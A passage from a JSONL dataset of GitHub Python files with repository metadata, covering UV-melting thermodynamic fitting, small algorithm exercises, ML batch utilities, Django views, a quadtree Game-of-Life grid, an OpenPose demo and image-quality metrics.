c='gray')\r\n ax[1].set_ylim([0, 100])\r\n\r\n sns.scatterplot(data=result_df, \r\n x='rmse', y='dH_std', color='gray',\r\n ax=ax[1])\r\n sns.scatterplot(data=result_df.query(qc_criterion), \r\n x='rmse', y='dH_std', color='salmon',\r\n ax=ax[1])\r\n ax[1].set_ylim([-5, 100])\r\n ax[1].axvline(0.015, linestyle='--', c='gray')\r\n ax[1].axhline(10, linestyle='--', c='gray')\r\n sns.despine()\r\n\r\n plt.suptitle('%.2f%% (%d / %d) passed QC' % (100 * result_df.eval(qc_criterion).sum() / len(result_df), result_df.eval(qc_criterion).sum(), len(result_df)))\r\n save_fig(os.path.join(datadir, 'fig', 'QC.pdf'), fig)\r\n plt.show()\r\n \r\n return result_df\r\n \r\ndef fit_all(datadir:str, sample_sheet_file:str, result_file:str='uvmelt.csv'):\r\n # noblank_result_df = fit_all_no_blank(datadir, sample_sheet_file, result_file.replace(\".csv\", \"_no_blank.csv\"))\r\n blank_result_df = fit_all_manual_blank(datadir, sample_sheet_file, result_file.replace(\".csv\", \"_manual_blank.csv\"))\r\n return blank_result_df\r\n \r\n###### Aggregate the results in each sample #####\r\ndef agg_fit_result(uvmelt_result_file, agg_result_file, sample_sheet_file,\r\n single_curve_qc_criteria=None,\r\n Tm_std_thresh=0.5, dH_std_thresh=1.5, clean=True, only_use_cooling=False):\r\n \"\"\"\r\n Aggregates multiple heat-cool cycles for a given cuvette, e.g. sample level\r\n Not aggregated to sequence level!\r\n \"\"\"\r\n uv = lambda x: processing.get_combined_param_bt(x, result_df.loc[x.index, x.name+'_std'])['p']\r\n uv_std = lambda x: processing.get_combined_param_bt(x, result_df.loc[x.index, x.name+'_std'])['e']\r\n \r\n if single_curve_qc_criteria is None:\r\n result_df = pd.read_csv(uvmelt_result_file, index_col=0).query('pass_qc')\r\n else:\r\n result_df = pd.read_csv(uvmelt_result_file, index_col=0)\r\n result_df['pass_qc'] = result_df.eval(single_curve_qc_criteria)\r\n result_df = result_df.query('pass_qc')\r\n sns.scatterplot(data=result_df.query('dH_std < 1e2 & Tm_std < 50 & dH < 0'), x='dH_std', y='Tm_std', hue='pass_qc')\r\n \r\n if only_use_cooling:\r\n result_df['isCooling'] = result_df.curve_name.apply(lambda x: 'Cooling' in x)\r\n result_df = result_df.query('isCooling')\r\n \r\n try:\r\n agg_stat = [uv, uv_std, len]\r\n result_agg_df = result_df.groupby(['SEQID', 'curve_date', 'curve_num']).agg(dict(dH=agg_stat, Tm=agg_stat)).reset_index()\r\n result_agg_df.columns = [f'{x[0]}_{x[1]}'.strip('_').replace('', 'uv').replace('', 'uv_std') for x in result_agg_df.columns]\r\n except:\r\n agg_stat = [np.median, np.std, len]\r\n result_agg_df = result_df.groupby(['SEQID', 'curve_date', 'curve_num']).agg(dict(dH=agg_stat, Tm=agg_stat)).reset_index()\r\n result_agg_df.columns = [f'{x[0]}_{x[1]}'.strip('_').replace('median', 'uv').replace('std', 'uv_std') for x in result_agg_df.columns]\r\n\r\n result_agg_df = result_agg_df.fillna(0)\r\n result_agg_df.rename(columns=dict(dH_len='n_curve'), inplace=True)\r\n result_agg_df.drop(columns='Tm_len', inplace=True)\r\n\r\n result_agg_df['dG_37_uv'] = get_dG(dH=result_agg_df.dH_uv, Tm=result_agg_df.Tm_uv, celsius=37)\r\n result_agg_df['dG_37_uv_std'] = get_dG_err(result_agg_df.dH_uv, result_agg_df.dH_uv_std, \r\n result_agg_df.Tm_uv, result_agg_df.Tm_uv_std,\r\n celsius=37)\r\n result_agg_df['dS_uv'] = get_dS(dH=result_agg_df.dH_uv, Tm=result_agg_df.Tm_uv)\r\n result_agg_df['dS_uv_std'] = get_dS_err(result_agg_df.dH_uv, result_agg_df.dH_uv_std, \r\n result_agg_df.Tm_uv, result_agg_df.Tm_uv_std)\r\n \r\n #TODO\r\n result_agg_df['is_hairpin'] = result_agg_df.SEQID.apply(lambda x: False if ('_' in x) or x.startswith('D') else True)\r\n result_agg_df['SEQID'] = result_agg_df.SEQID.apply(lambda x: x.split('_')[0] if '_' in x else x)\r\n \r\n sample_sheet = read_sample_sheet(sample_sheet_file)\r\n for col in ['Na_mM', 'conc_uM', 'Purification']:\r\n result_agg_df[col] = lookup_sample_df(result_agg_df, sample_sheet, col)\r\n \r\n qc_criterion = 'Tm_uv_std < %f & dH_uv_std < %f' % (Tm_std_thresh, dH_std_thresh)\r\n fig, ax = plt.subplots(1, 2, figsize=(8,4))\r\n sns.scatterplot(data=result_agg_df,\r\n x='dH_uv_std', y='Tm_uv_std', hue='n_curve',\r\n palette='plasma', ax=ax[0])\r\n ax[0].axhline(Tm_std_thresh, linestyle='--', c='gray')\r\n ax[0].axvline(dH_std_thresh, linestyle='--', c='gray')\r\n ax[0].set_title('%.2f%% (%d / %d) variants passed QC' % \r\n (100 * result_agg_df.eval(qc_criterion).sum() / len(result_agg_df), result_agg_df.eval(qc_criterion).sum(), len(result_agg_df)))\r\n sns.scatterplot(data=result_df.query('dH_std < 1e2 & Tm_std <20'), x='dH_std', y='Tm_std', hue='rmse', ax=ax[1])\r\n ax[1].set_title('single curves used')\r\n sns.despine()\r\n save_fig(agg_result_file.replace('.csv', '.pdf'), fig)\r\n \r\n if clean:\r\n result_agg_df = result_agg_df.query(qc_criterion)\r\n else:\r\n result_agg_df['pass_qc'] = result_agg_df.eval(qc_criterion)\r\n \r\n result_agg_df.to_csv(agg_result_file)\r\n \r\n return result_agg_df\r\n \r\n \r\n###### Adjust systematic offset ######\r\ndef prep_x_y_yerr(df, param, adjusted=True):\r\n if adjusted:\r\n x_suffix = '_adjusted'\r\n else:\r\n x_suffix = ''\r\n \r\n x = df[param+x_suffix].values.reshape(-1,1)\r\n y = df[param+'_uv'].values.reshape(-1,1)\r\n yerr = df[param+'_uv_std'].values.reshape(-1,1)\r\n yerr[yerr==0] = np.median(yerr)\r\n return add_intercept(x), y, yerr\r\n\r\ndef fit_param_offset(df, param, fix_slope=False, adjusted=True):\r\n x, y, yerr = prep_x_y_yerr(df, param, adjusted)\r\n ols = LinearRegressionSVD(param=param)\r\n if fix_slope:\r\n ols.coef_ = np.array([1.0, 0.0])\r\n ols.fit_intercept_only(x, y)\r\n else:\r\n ols.fit(x, y, yerr)\r\n return ols\r\n \r\ndef correct_param(df, correction_dict, param:str):\r\n \"\"\"\r\n x - your data\r\n \"\"\"\r\n x = add_intercept(df[param].values.reshape(-1,1))\r\n return x @ correction_dict[param].reshape(2,1)","repo_name":"keyuxi/nnn_paper","sub_path":"nnn/uv.py","file_name":"uv.py","file_ext":"py","file_size_in_byte":32369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29919880677","text":"\ndef prime_factors(num):\n tst = [x for x in reversed(range(1,num))]\n pf =[]\n x = 0\n while (x < len(tst)):\n if (num%tst[x] == 0 and isprime(tst[x])and tst[x] != 1):\n pf.append(tst[x])\n num /= tst[x]\n else:\n x +=1\n pf.reverse()\n return pf\n \ndef isprime(num):\n if (num == 2):\n return True\n return not any([num%x == 0 for x in range(2,num)])\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"8vBvgJMc2uQJpD6d7_13.py","file_name":"8vBvgJMc2uQJpD6d7_13.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33594517696","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 12 11:23:37 2017\r\n\r\n@author: nsde\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport os, sys\r\nimport numpy as np\r\n\r\n#%%\r\nclass lmnn_batch_builder():\r\n def __init__(self, X, y, tN, imp, k, batch_size, shuffel=True):\r\n # Data\r\n self.X = X\r\n self.y = y\r\n \r\n # Append imposters to target neighbour structure\r\n imp_r = imp[:,1].repeat(k) # repeat the imposters\r\n imp_r = imp_r.reshape((-1,k,k)).transpose((0,2,1)).reshape((-1,k))\r\n self.combined = np.hstack((tN, imp_r))\r\n \r\n # Shuffel\r\n if shuffel:\r\n self.combined = np.random.permutation(self.combined)\r\n \r\n # Constants\r\n self.batch_size = batch_size\r\n self.counter = 0\r\n self.n = tN.shape[0]\r\n \r\n def __next__(self):\r\n batch_idx = self.combined[self.counter:self.counter+self.batch_size]\r\n self.counter += self.batch_size\r\n idx, inv_idx = np.unique(batch_idx, return_inverse=True)\r\n inv_idx = np.reshape(inv_idx, (-1, 5))[:,:2]\r\n return self.X[idx], self.y[idx], inv_idx\r\n \r\n def __iter__(self):\r\n while self.counter < self.n:\r\n batch_idx = self.combined[self.counter:self.counter+self.batch_size]\r\n self.counter += self.batch_size\r\n idx, inv_idx = np.unique(batch_idx, return_inverse=True)\r\n inv_idx = np.reshape(inv_idx, (-1, 5))[:,:2]\r\n yield self.X[idx], self.y[idx], inv_idx\r\n \r\n def __len__(self):\r\n return int(np.ceil(self.n / self.batch_size))\r\n\r\n#%%\r\nclass batchifier():\r\n ''' Small iterator that will cut the input data into smaller batches. Can\r\n then be used in a for-loop like:\r\n for x_batch in batchifier(X, 100):\r\n # x_batch.shape[0] = 100 \r\n '''\r\n \r\n def __init__(self, data, batch_size):\r\n self.data = data\r\n self.batch_size = batch_size \r\n self.counter = 0\r\n self.N = self.data.shape[0]\r\n \r\n def __iter__(self):\r\n while self.counter < self.N:\r\n yield self.data[self.counter:self.counter+self.batch_size]\r\n self.counter += self.batch_size\r\n\r\n def __len__(self):\r\n return int(np.ceil(self.data.shape[0] / self.batch_size))\r\n\r\n#%%\r\ndef get_dir(file):\r\n \"\"\" Get the folder of specified file \"\"\"\r\n return os.path.dirname(os.path.realpath(file))\r\n\r\n#%%\r\ndef create_dir(direc):\r\n \"\"\" Create a dir if it does not already exists \"\"\"\r\n if not os.path.exists(direc):\r\n os.mkdir(direc)\r\n\r\n#%%\r\ndef colorise(string, color='green'):\r\n if color=='green': col='0;32;40m'\r\n elif color=='blue': col='0;34;40m'\r\n elif color=='red': col='0;31;40m'\r\n begin = '\\x1b['\r\n end = '\\033[0m'\r\n return begin + col + string + end\r\n\r\n#%%\r\ndef progressBar(value, endvalue, name = 'Process', bar_length=20):\r\n percent = float(value) / endvalue\r\n arrow = '-' * int(round(percent * bar_length)-1) + '>'\r\n spaces = ' ' * (bar_length - len(arrow))\r\n\r\n sys.stdout.write(\"\\r{0}: [{1}] {2}%\".format(name, arrow + spaces, int(round(percent * 100))))\r\n sys.stdout.flush()\r\n \r\n#%%\r\ndef get_optimizer(name):\r\n ''' Returns a tensorflow optimizer based on name '''\r\n optimizer = {'adam': tf.train.AdamOptimizer,\r\n 'sgd': tf.train.GradientDescentOptimizer,\r\n 'momentum': tf.train.MomentumOptimizer}\r\n try:\r\n opt = optimizer[name]\r\n return opt\r\n except KeyError:\r\n raise Exception(name + ' is a invalid option to input optimizer, please'\r\n + ' choose between: ' + ', '.join(optimizer.keys()))\r\n\r\n#%%\r\ndef adjust_learning_rate(alpha, loss_new, loss_old):\r\n ''' Function for adjusting the learning rate while training '''\r\n out_alpha = alpha*1.01 if loss_new <= loss_old else alpha*0.5\r\n return out_alpha\r\n\r\n#%%\r\nif __name__ == '__main__':\r\n print(get_dir(__file__))","repo_name":"SkafteNicki/Deep_LMNN","sub_path":"dlmnn/helper/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7001457280","text":"#!/usr/bin/python3\n\"\"\" FileStorage class \"\"\"\n\n\nfrom os.path import exists\nimport json\nfrom models.base_model import BaseModel\n\n\nclass FileStorage:\n \"\"\" FileStorage class \"\"\"\n\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self):\n \"\"\" returns the dictionary objects \"\"\"\n return self.__objects\n\n def new(self, obj):\n \"\"\" sets in objects the obj with key .id \"\"\"\n\n key = \"{}.{}\".format(obj.__class__.__name__, obj.id)\n self.__objects[key] = obj\n self.save()\n\n def save(self):\n \"\"\" serializes objects to the JSON file \"\"\"\n dicts = {}\n for key, value in self.__objects.items():\n dicts[key] = value.to_dict()\n with open(self.__file_path, 'w') as f:\n json.dump(dicts, f)\n\n def reload(self):\n \"\"\" deserializes the JSON file to objects \"\"\"\n if exists(self.__file_path):\n with open(self.__file_path, 'r') as f:\n dicts = json.load(f)\n for key, value in dicts.items():\n self.__objects[key] = BaseModel(**value)\n else:\n pass\n","repo_name":"IsmaelMolina-code/holbertonschool-AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15382545108","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Product\nfrom django.http import Http404\nfrom django.db.models import Avg, Min, Max\n\n\n# Create your views here.\n\ndef product_list(request):\n products = Product.objects.all().order_by('-rating')\n number_of_products = products.count()\n average = products.aggregate(Avg('rating'))\n return render(request, 'product_module/product_list.html', {\n 'products': products,\n 'total_number_of_product':number_of_products,\n 'average_ratings': average,\n })\n\n\n\ndef product_detail(request, slug):\n # try:\n # product = Product.objects.get(id=product_id)\n # except:\n # raise Http404()\n product = get_object_or_404(Product, slug=slug)\n return render(request, 'product_module/product_detail.html', {\n 'product': product\n })\n","repo_name":"Khodaprst/GitHub","sub_path":"eshop_project/product_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"13969098057","text":"import random\nim = open('Image/dos.pgm','w')\nim.write('P2\\n')\nim.write('# Hugo Araya Carrasco\\n')\nim.write('512 512\\n')\nim.write('255\\n')\nimagen = ''\nfor i in range(512*512):\n numero = random.randint(0,255)\n imagen = imagen + str(numero)+' '\n\nim.write(imagen+'\\n')\nim.close()","repo_name":"hugo-araya/Seccion1","sub_path":"imagen_pgm/ran.py","file_name":"ran.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18744116964","text":"from typing import List\n\n\nclass Solution:\n def minAvailableDuration(self, slots1: List[List[int]], slots2: List[List[int]], duration: int) -> List[int]:\n idx1 = idx2 = 0\n\n slots1 = sorted(slots1)\n slots2 = sorted(slots2)\n\n while idx1 <= len(slots1) - 1 and idx2 <= len(slots2) - 1:\n s1 = slots1[idx1]\n s2 = slots2[idx2]\n left_intersection = max(s1[0], s2[0])\n right_intersection = min(s1[1], s2[1])\n if right_intersection - left_intersection >= duration:\n return [left_intersection, left_intersection + duration]\n\n # always move the one that ends earlier!\n if s1[1] < s2[1]:\n idx1 += 1\n else:\n idx2 += 1\n\n return []\n","repo_name":"ivankliuk/leetcode","sub_path":"python/meeting-scheduler.py","file_name":"meeting-scheduler.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3088785121","text":"from collections import defaultdict\nfrom typing import *\n\nfrom tqdm import tqdm\n\nfrom backend.trainers.components.mappings.base import _display_creation_kickoff_message\nfrom backend.trainers.components.mappings.token.occurrences import (\n ParaphrasesPOSTagsList,\n ParaphrasesTokens,\n ParaphrasesTokensList\n)\nfrom backend.trainers.components.mappings.token.sentence_indices.base import SentenceIndex2UniqueTokens\nfrom backend.trainers.components.sentence_data import SentenceData\nfrom backend.utils import iterables, strings\n\n\ndef token_maps_foundations(\n sentence_data: SentenceData,\n tokenize_with_pos_tags: Callable[[str], List[Tuple[str, str]]]\n) -> Tuple[SentenceIndex2UniqueTokens, Tuple[ParaphrasesTokensList, ParaphrasesPOSTagsList]]:\n\n # create paraphrases map\n english_sentence_2_paraphrases_with_indices = _english_sentence_paraphrases_with_indices_map(sentence_data=sentence_data)\n\n # define foundations\n sentence_index_2_unique_tokens: SentenceIndex2UniqueTokens = {}\n paraphrases_tokens_list: ParaphrasesTokensList = []\n paraphrases_pos_tags_list: ParaphrasesPOSTagsList = []\n\n # procure proper nouns\n proper_nouns: Set[str] = sentence_data.deduce_proper_nouns()\n\n print('Creating token maps foundations...')\n for paraphrases_with_indices in tqdm(english_sentence_2_paraphrases_with_indices.values()):\n paraphrases, indices = iterables.unzip(paraphrases_with_indices)\n\n # tokenize paraphrases and procure pos tags\n paraphrases_tokens_with_pos_tags: List[List[Tuple[str, str]]] = [tokenize_with_pos_tags(sentence) for sentence in paraphrases]\n if any(map(len, paraphrases_tokens_with_pos_tags)):\n paraphrases_tokens, paraphrases_pos_tags = map(iterables.none_stripped, iterables.unzip_longest(map(lambda paraphrase_tokens_with_pos_tags: iterables.unzip(paraphrase_tokens_with_pos_tags), paraphrases_tokens_with_pos_tags)))\n\n # strip proper nouns, tokens containing digits; convert to lowercase\n paraphrases_tokens = _process_paraphrases_tokens(paraphrases_tokens, proper_nouns=proper_nouns)\n\n # update foundations\n sentence_index_2_unique_tokens.update({index: set(comprising_tokens) for index, comprising_tokens in zip(indices, paraphrases_tokens)})\n paraphrases_tokens_list.append(paraphrases_tokens)\n paraphrases_pos_tags_list.append(paraphrases_pos_tags)\n\n return sentence_index_2_unique_tokens, (paraphrases_tokens_list, paraphrases_pos_tags_list)\n\n\n@_display_creation_kickoff_message('Creating paraphrases map...')\ndef _english_sentence_paraphrases_with_indices_map(sentence_data: SentenceData) -> DefaultDict[str, List[Tuple[str, int]]]:\n english_sentence_2_paraphrases = defaultdict(list)\n\n for i, (english_sentence, foreign_sentence) in enumerate(tqdm(sentence_data)):\n english_sentence_2_paraphrases[english_sentence].append((foreign_sentence, i))\n\n return english_sentence_2_paraphrases\n\n\ndef _process_paraphrases_tokens(paraphrases_tokens: ParaphrasesTokens, proper_nouns: Set[str]) -> ParaphrasesTokens:\n \"\"\" Removes proper nouns, tokens containing digits from paraphrases tokens,\n converts tokens to lowercase \"\"\"\n\n for i, paraphrase_tokens in enumerate(paraphrases_tokens):\n lowercase_paraphrase_tokens = (token.lower() for token in paraphrase_tokens)\n paraphrases_tokens[i] = list(filter(lambda token: token not in proper_nouns and strings.is_digit_free(token), lowercase_paraphrase_tokens))\n\n return paraphrases_tokens\n","repo_name":"w2sv/Lingularity-DataMiner","sub_path":"src/token_maps/foundations.py","file_name":"foundations.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11486050607","text":"import warnings\n\nimport numpy as np\nfrom ranges import Range\n\nfrom .state import State\nfrom .extent import RectangleExtent, Point2D\nfrom .utils import int_log2\n\n\ndef empty_quadtree(extent: RectangleExtent, default=State.DEAD):\n from .node import Quadtree\n assert extent.width == extent.height\n level = int_log2(extent.width)\n return Quadtree.empty(level, default)\n\n\nclass Grid(np.ndarray):\n @classmethod\n def from_list(cls, l):\n return np.asarray(l, dtype=object).view(cls)\n\n def __repr__(self):\n return f\"{self.__class__.__name__}(shape={self.shape})\"\n\n def __str__(self):\n if self.ndim != 2:\n warnings.warn(f'Grid should be 2-dimensional, got shape {self.shape}')\n return super().__str__()\n elif self.shape[0] > 0 and self.shape[1] > 0 and not isinstance(self[0, 0], State):\n return super().__str__()\n return '\\n'.join(''.join(str(state) for state in row) for row in self)\n\n @classmethod\n def from_str(cls, s):\n s = s.strip()\n lines = s.splitlines()\n return np.array([[State.from_str(c) for c in line.strip()] for line in lines], dtype=object).view(cls)\n\n @classmethod\n def uninhabitable(cls, width, height):\n # np.full casts our IntEnum to int64 despite dtype=object, so we first\n # create an empty array and then fill it\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.UNINHABITABLE\n return grid.view(cls)\n\n @classmethod\n def dead(cls, width, height):\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.DEAD\n return grid.view(cls)\n\n\nclass LazyGrid:\n def __init__(self, default=State.DEAD):\n assert isinstance(default, State)\n self.default = default\n self._grids = []\n\n def add_grid(self, offset: Point2D, grid: Grid):\n assert isinstance(grid, Grid)\n assert isinstance(offset, Point2D)\n extent = RectangleExtent(Range(offset.x, offset.x + grid.shape[1]), Range(offset.y, offset.y + grid.shape[0]))\n self._grids.append((extent, grid))\n\n def get_quadtree(self, extent: RectangleExtent):\n from .node import QuadtreeBranch, QuadtreeLeaf\n assert extent.width == extent.height\n if extent.width == 1:\n return QuadtreeLeaf(self[Point2D(extent.x_range.start, extent.y_range.start)])\n elif not any(extent.intersects(other_extent) for other_extent, _ in self._grids):\n return empty_quadtree(extent, self.default)\n else:\n assert extent.width % 2 == 0 and extent.height % 2 == 0\n half_width = extent.width // 2\n half_height = extent.height // 2\n ((nw, ne), (sw, se)) = extent.split_x_y()\n return QuadtreeBranch(np.array([\n [self.get_quadtree(nw), self.get_quadtree(ne)],\n [self.get_quadtree(sw), self.get_quadtree(se)]\n ], dtype=object))\n\n def __getitem__(self, point: Point2D):\n values = []\n for extent, grid in self._grids:\n if point in extent:\n values.append(grid[point.y - extent.y_range.start, point.x - extent.x_range.start])\n if values:\n if values[0] == State.UNINHABITABLE:\n assert all(value == State.UNINHABITABLE for value in values)\n return State.UNINHABITABLE\n elif any(value == State.ALIVE for value in values): # OR all values\n return State.ALIVE\n else:\n return State.DEAD\n return self.default\n\n\nclass GridFromQuadtree:\n def __init__(self, quadtree):\n self.quadtree = quadtree\n\n def __getitem__(self, point: Point2D):\n return self.quadtree.get_state(point.x, point.y)\n\n def initial_quadtree_and_extent(self):\n return self.quadtree, RectangleExtent(\n Range(0, self.quadtree.width()),\n Range(0, self.quadtree.width()),\n )\n\n def expand_quadtree_and_extent(self, quadtree, extent: RectangleExtent):\n from .node import QuadtreeBranch\n empty = empty_quadtree(extent)\n if (extent.x_range.start + extent.x_range.end) // 2 > 0:\n # Midpoint is positive; expand north-west\n new_extent = RectangleExtent(\n Range(extent.x_range.start - extent.width, extent.x_range.end),\n Range(extent.y_range.start - extent.height, extent.y_range.end),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [empty, empty],\n [empty, quadtree]\n ], dtype=object))\n else:\n # Midpoint is negative; expand south-east\n new_extent = RectangleExtent(\n Range(extent.x_range.start, extent.x_range.end + extent.width),\n Range(extent.y_range.start, extent.y_range.end + extent.height),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [quadtree, empty],\n [empty, empty]\n ], dtype=object))\n return (new_quadtree, new_extent)\n","repo_name":"joliss/hashlife3d","sub_path":"src/hashlife3d/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40164374455","text":"import sys\nimport cv2\nimport argparse\nimport time\nfrom pose.openpose.import_libs import openpose, openpose_model_folder\n\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--image_dir\", default=\"../examples/media/\",\n help=\"Process a directory of images. Read all standard formats (jpg, png, bmp, etc.).\"\n )\n parser.add_argument(\"--no_display\", default=True, help=\"Enable to disable the visual display.\")\n args = parser.parse_known_args()\n\n # Custom Params (refer to include/openpose/flags.hpp for more parameters)\n params = dict()\n params[\"model_folder\"] = openpose_model_folder\n\n # Add others in path?\n for i in range(0, len(args[1])):\n curr_item = args[1][i]\n if i != len(args[1]) - 1:\n next_item = args[1][i + 1]\n else:\n next_item = \"1\"\n if \"--\" in curr_item and \"--\" in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = \"1\"\n elif \"--\" in curr_item and \"--\" not in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = next_item\n\n # Construct it from system arguments\n # op.init_argv(args[1])\n # oppython = op.OpenposePython()\n\n # Starting OpenPose\n opWrapper = openpose.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n # Read frames on directory\n imagePaths = openpose.get_images_on_directory(args[0].image_dir)\n start = time.time()\n\n # Process and display images\n for imagePath in imagePaths:\n datum = openpose.Datum()\n imageToProcess = cv2.imread(imagePath)\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop(openpose.VectorDatum([datum]))\n\n print(\"Body keypoints: \\n\" + str(datum.poseKeypoints))\n\n if not args[0].no_display:\n cv2.imshow(\"OpenPose 1.7.0 - Tutorial Python API\", datum.cvOutputData)\n key = cv2.waitKey(15)\n if key == 27:\n break\n\n end = time.time()\n print(\"OpenPose demo successfully finished. Total time: \" + str(end - start) + \" seconds\")\nexcept Exception as e:\n print(e)\n sys.exit(-1)\n","repo_name":"realzza/Presento","sub_path":"pose/openpose/04_keypoints_from_images.py","file_name":"04_keypoints_from_images.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72626342812","text":"import cv2\nimport numpy as np\nimport torch\n\n# convert 2/3/4-dimensional torch tensor to uint\ndef tensor2uint(img: torch.Tensor):\n img = img.squeeze().float().clamp_(0, 1).cpu().numpy()\n if img.ndim == 3:\n img = np.transpose(img, (1, 2, 0))\n return np.uint8((img*255.0).round())\n \ndef calculate_psnr(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n mse = np.mean((img1 - img2) ** 2)\n if mse == 0:\n return float('inf')\n return 20. * np.log10(255. / np.sqrt(mse))\n\n\ndef _ssim(img1, img2):\n C1 = (0.01 * 255) ** 2\n C2 = (0.03 * 255) ** 2\n\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n kernel = cv2.getGaussianKernel(11, 1.5)\n window = np.outer(kernel, kernel.transpose())\n\n mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5]\n mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]\n mu1_sq = mu1 ** 2\n mu2_sq = mu2 ** 2\n mu1_mu2 = mu1 * mu2\n sigma1_sq = cv2.filter2D(img1 ** 2, -1, window)[5:-5, 5:-5] - mu1_sq\n sigma2_sq = cv2.filter2D(img2 ** 2, -1, window)[5:-5, 5:-5] - mu2_sq\n sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n return ssim_map.mean()\n\n\ndef calculate_ssim(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if img1.dtype is not np.uint8:\n img1 = (img1 * 255.0).round().astype(np.uint8) # float32 to uint8\n if img2.dtype is not np.uint8:\n img2 = (img2 * 255.0).round().astype(np.uint8) # float32 to uint8\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n ssims = []\n for i in range(img1.shape[2]):\n ssims.append(_ssim(img1[..., i], img2[..., i]))\n return np.array(ssims).mean()\n\n\ndef _blocking_effect_factor(im):\n block_size = 8\n\n block_horizontal_positions = torch.arange(7, im.shape[3] - 1, 8)\n block_vertical_positions = torch.arange(7, im.shape[2] - 1, 8)\n\n horizontal_block_difference = (\n (im[:, :, :, block_horizontal_positions] - im[:, :, :, block_horizontal_positions + 1]) ** 2).sum(\n 3).sum(2).sum(1)\n vertical_block_difference = (\n (im[:, :, block_vertical_positions, :] - im[:, :, block_vertical_positions + 1, :]) ** 2).sum(3).sum(\n 2).sum(1)\n\n nonblock_horizontal_positions = np.setdiff1d(torch.arange(0, im.shape[3] - 1), block_horizontal_positions)\n nonblock_vertical_positions = np.setdiff1d(torch.arange(0, im.shape[2] - 1), block_vertical_positions)\n\n horizontal_nonblock_difference = (\n (im[:, :, :, nonblock_horizontal_positions] - im[:, :, :, nonblock_horizontal_positions + 1]) ** 2).sum(\n 3).sum(2).sum(1)\n vertical_nonblock_difference = (\n (im[:, :, nonblock_vertical_positions, :] - im[:, :, nonblock_vertical_positions + 1, :]) ** 2).sum(\n 3).sum(2).sum(1)\n\n n_boundary_horiz = im.shape[2] * (im.shape[3] // block_size - 1)\n n_boundary_vert = im.shape[3] * (im.shape[2] // block_size - 1)\n boundary_difference = (horizontal_block_difference + vertical_block_difference) / (\n n_boundary_horiz + n_boundary_vert)\n\n n_nonboundary_horiz = im.shape[2] * (im.shape[3] - 1) - n_boundary_horiz\n n_nonboundary_vert = im.shape[3] * (im.shape[2] - 1) - n_boundary_vert\n nonboundary_difference = (horizontal_nonblock_difference + vertical_nonblock_difference) / (\n n_nonboundary_horiz + n_nonboundary_vert)\n\n scaler = np.log2(block_size) / np.log2(min([im.shape[2], 